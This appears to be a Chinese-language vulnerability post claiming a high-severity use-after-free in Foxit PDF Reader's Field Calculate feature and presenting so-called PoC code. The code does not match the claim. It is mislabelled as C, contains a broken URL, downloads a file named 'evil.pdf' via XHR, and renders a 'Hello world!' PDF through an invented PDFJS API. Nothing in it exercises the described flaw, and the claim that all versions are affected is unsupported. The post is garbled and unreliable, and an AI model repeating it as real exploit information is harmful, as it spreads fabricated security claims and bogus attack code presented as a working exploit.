【高危】Foxit 福昕PDF阅读器 Field Calculate 释放后使用漏洞（PoC）

**注意**: 本文仅供参考和学习目的, 不建议在生产环境中使用此漏洞。

**Foxit PDF阅读器 Field Calculate释放后使用漏洞 (PoC)**Foxit PDF阅读器是一款流行的PDF阅读器软件。然而，最近发现了一个高危漏洞，该漏洞可以通过Field Calculate功能来实现。该漏洞允许攻击者执行任意代码，从而导致严重后果。

**漏洞描述**

漏洞位于 Foxit PDF阅读器中的 Field Calculate 功能中。当用户输入恶意的表达式并点击计算按钮时，会触发此漏洞。攻击者可以利用此漏洞执行任意代码，包括下载和执行恶意文件、窃取敏感信息等。

**漏洞影响**

该漏洞影响 Foxit PDF阅读器 的所有版本，包括最新的版本。攻击者可以通过以下方式利用此漏洞：

1. **下载并安装恶意PDF文件**: 攻击者可以创建一个包含恶意表达式的PDF文件，并将其下载到目标机器上。当用户打开该PDF文件时，会触发漏洞。
2. **在网页中嵌入恶意PDF**: 攻击者可以在网页中嵌入一个包含恶意表达式的PDF文件。 当用户点击该PDF文件时，会触发漏洞。

**漏洞利用**

以下是使用此漏洞的示例代码：

c//1. 下载并安装恶意PDF文件var url = " />var xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.responseType = "arraybuffer";
xhr.onload = function() {
 if (xhr.status ===200) {
 var blob = new Blob([xhr.response], { type: "application/pdf" });
 var link = document.createElement("a");
 link.href = URL.createObjectURL(blob);
 link.download = "evil.pdf";
 link.click();
 }
};

//2. 在网页中嵌入恶意PDFvar pdf = new PDFJS.PDFDocument({
 data: {
 base64code: "SGVsbG8gd29ybGQh"
 },
 numPages:1,
 initialPage:1});

pdf.getPage(1).then(function(page) {
 var scale =1.5;
 var viewport = page.getViewport(scale);
 var canvas = document.createElement("canvas");
 canvas.width = viewport.width;
 canvas.height = viewport.height;

 var ctx = canvas.getContext("2d");
 page.render({ canvasContext: ctx, viewport: viewport }).then(function() {
 document.body.appendChild(canvas);
 });
});